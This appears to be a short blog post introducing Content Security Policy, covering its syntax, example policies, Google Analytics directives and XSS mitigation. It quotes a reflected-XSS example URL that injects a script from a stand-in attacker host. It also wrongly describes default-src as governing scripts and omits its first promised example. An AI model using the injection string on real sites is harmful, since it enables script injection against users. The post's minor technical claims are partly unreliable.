What is a Content Security Policy?
And why should you implement one on your website?
CSP is one of your first lines of defense against malicious actors on the internet. What a content security policy allows you to do, fundamentally, is to to specify what addresses you want to allow your website to load scripts and other resources from. It looks something like this:
To set it you will either add the above line (configured to your liking) to the header section of every page on your website, or configure your server to do the same thing for you. Visit the MDN Docs example section if you want to jump the gun and just get going right away, or read on to learn more about the why and the details.
Using a Content Security Policy:
You assemble the attributes of the CSP in the following format:
content="{sourceType} {restrictionRule}; {sourceType}{restrictionRule}; {sourceType} {restrictionRule}; etc..."There are 5 sourceTypes in the CSP that you should be aware of. Each of them restricts the allowed sources of a specific file type by the rule that you provide. For example, if you only want to allow your website to request images from the current domain, then you can add img-src ‘self’ to your CSP. See the other important source locations below:
default-src(refers to scripts loaded on the site)img-srcmedia-srcstyle-srcconnect-src(refers to AJAX and other web APIs that send information requests across the internet)
Here is an example CSP using several of the sourceTypes above:
content = "default-src 'self'; style-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com;"How to set restriction rules for each content type:
The syntax for setting the specific restriction rules are varied and complex, allowing you to set any restrictionRule that you want for a specific sourceType. You can read through the syntax here.
What about Google Analytics?
Well, yes. Great catch. GA is one of the main external scripts that you will need to load on your website, and they are a fairly needy customer. They’ll need you to include the following directives for GA to work properly:
script-src: https://www.google-analytics.com https://ssl.google-analytics.com
img-src: https://www.google-analytics.com
connect-src: https://www.google-analytics.comWhy Content security policy?
Content Security Policy (CSP) helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks.
XSS (Cross Site Scripting)
A primary goal of CSP is to mitigate and report XSS attacks. XSS attacks exploit the browser’s trust of the content received from the server. The most common XSS mode is called reflection, where a hacker will send a link that contains a query string with a script inside (www.example.com?searchTerm=<script src=‘www.hacker.ca’></script>). The server “reflects” that script, sending it back to the users browser which fetches and executes the script unknowingly. This tactic works because the browser trusts the source of the content, even when it’s not coming from where it seems to be coming from. A CSP will catch this type of attack in most cases, by blocking that initial script from loading.
Packet Sniffing
In addition to restricting the domains from which content can be loaded, the server can specify which protocols are allowed to be used; for example (and ideally, from a security standpoint), a server can specify that all content must be loaded using HTTPS. HTTPS was created to prevent packet sniffing, whereby hackers intercept and decode data as it travels across the internet.
I hope that this brief overview of Content Security Policy is useful to some of you, thanks for reading!
